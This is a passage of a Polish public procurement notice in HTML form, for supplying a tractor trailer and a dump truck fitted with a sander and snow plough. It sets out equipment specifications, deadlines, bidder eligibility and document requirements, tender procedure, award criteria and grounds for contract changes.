Ilość pozycji roboczych: 3.3)	Masa własna maszyny od 500 do 650 kg.4)	Wysokość robocza min. 1 050 mm.5)	Sterowanie z kabiny kierowcy.6)	Zasilanie hydrauliczne, elektryczne, zapotrzebowanie mocy dostosowane do samochodu ciężarowego.7)	Oświetlenie obrysowe i drogowe.8)	Lemiesze gumowe.9)	Lemiesz uchylny.10)	Zabezpieczenie przeciążeniowe.11)	Bezawaryjne i bezpieczne pokonywanie przeszkód drogowych (system ,,by-pass") - funkcja wychylania się pługa przy najechaniu na przeszkodę.12)	Koła podporowe z płynną regulacją wysokości pługa.13)	Tablice ostrzegawcze.14)	Posiada wymagane prawem atesty i homologacje.Pozostałe wymogi zamówienia:1)	Kolor do uzgodnienia na etapie realizacji zamówienia.2)	Instrukcja obsługi i katalog części zamiennych w języku polskim zostaną dostarczone przez Wykonawcę wraz z przekazanym sprzętem. 3)	Szkolenie minimum 2 pracowników wskazanych przez Zamawiającego w miejscu dostawy pojazdu.4)	Gwarancja min. 24 miesiące na cały sprzęt.5)	Serwis gwarancyjny w okresie gwarancji ma być świadczony w miejscu postoju piaskarki nieodpłatnie, z wyjątkiem materiałów podlegających okresowej wymianie oraz kosztów dojazdu.6) Dostawa przedmiotu zamówienia do siedziby Zamawiającego.7)	Termin realizacji: maksymalnie do 30.06.2019 rok.TERMIN WYKONANIA ZAMÓWIENIA:- Część I: maksymalnie do 21 dni od daty zawarcia umowy;- Część II: maksymalnie do 30.06.2019 rok.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">34000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16000000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43000000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16500000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16520000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34100000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34139000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34139100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34140000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34144400-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34144440-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43300000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43310000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43313000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43313100-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>21</TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-06-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Dotyczy sekcji II pkt II.8) niniejszego ogłoszenia: Termin wykonania zamówienia: - Część I: maksymalnie do 21 dni od daty zawarcia umowy;- Część II: maksymalnie do 30.06.2019 rok.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow">W związku z tym, iż Zamawiający nie stawia szczególnych wymagań w zakresie spełniania warunków dotyczących: 1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, 2) sytuacji ekonomicznej lub finansowej, 3) zdolności technicznej lub zawodowej, Wykonawca nie składa oświadczenia o spełnianiu warunków udziału w postępowaniu. </span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe">W związku z tym, iż Zamawiający nie stawia szczególnych wymagań w zakresie spełniania warunków dotyczących: 1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, 2) sytuacji ekonomicznej lub finansowej, 3) zdolności technicznej lub zawodowej, Wykonawca nie składa oświadczenia o spełnianiu warunków udziału w postępowaniu. </span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">W związku z tym, iż Zamawiający nie stawia szczególnych wymagań w zakresie spełniania warunków dotyczących: 1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, 2) sytuacji ekonomicznej lub finansowej, 3) zdolności technicznej lub zawodowej, Wykonawca nie składa oświadczenia o spełnianiu warunków udziału w postępowaniu. </span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Nie</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na dzień złożenia następującego dokumentu potwierdzającego brak podstaw do wykluczenia wykonawcy z postępowania: - odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy pzp. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o których mowa powyżej - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców wskazany dokument składany jest dla każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w ust. 2 rozdz. III SIWZ, Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnej na dzień złożenia:- specyfikacji technicznej oferowanej przyczepy o ładowność 8 ton do ciągnika rolniczego - wg wzoru stanowiącego załącznik nr 4a do SIWZ - dot. Cz. I.- specyfikacji technicznej oferowanego samochodu ciężarowego typu wywrotka wraz z dodatkowym osprzętem, tj. nową piaskarką i pługiem do odśnieżania - wg wzoru stanowiącego załącznik nr 4b do SIWZ - dot. Cz. II.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Na ofertę oprócz oświadczenia, o którym mowa w rozdz. VI ust. 2 pkt 1 SIWZ, tj oświadczenia o niepodleganiu wykluczeniu składają się: 1)formularz ofertowy - wzór załącznik nr 1 do SIWZ, 2)	jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonych do oferty dokumentów, do oferty należy dołączyć pełnomocnictwo lub dokument, z którego będzie wynikać uprawnienie do podpisywania oferty, 3) pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik. 4) w przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie, pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. 2. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2017 r. poz. 229, 1089 i 1132) - wg wzoru stanowiącego załącznik nr 3 do SIWZ. UWAGA: W związku z tym, iż Zamawiający nie stawia szczególnych wymagań w zakresie spełniania warunków dotyczących: 1) kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, 2) sytuacji ekonomicznej lub finansowej, 3) zdolności technicznej lub zawodowej, Wykonawca nie składa oświadczenia o spełnianiu warunków udziału w postępowaniu.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA oferty brutto </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>GWARANCJA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy, w przypadku wystąpienia w trakcie realizacji zawartej umowy jednej z następujących okoliczności: a) przesunięcie terminu wykonania dostawy będzie możliwe w przypadku działania siły wyższej mającej wpływ na termin wykonania zamówienia, (np. działanie sił przyrody huragan, powódź, pożar; stan wojenny, stan wyjątkowy itp.), b) w przypadku zmiany urzędowej wysokości stawki podatku VAT, w zakresie przedmiotu zawarcia umowy, na wniosek Wykonawcy lub Zamawiającego, zostanie sporządzony aneks do umowy uwzględniający zmiany wartości wynikające z tego tytułu. </span> <br/> 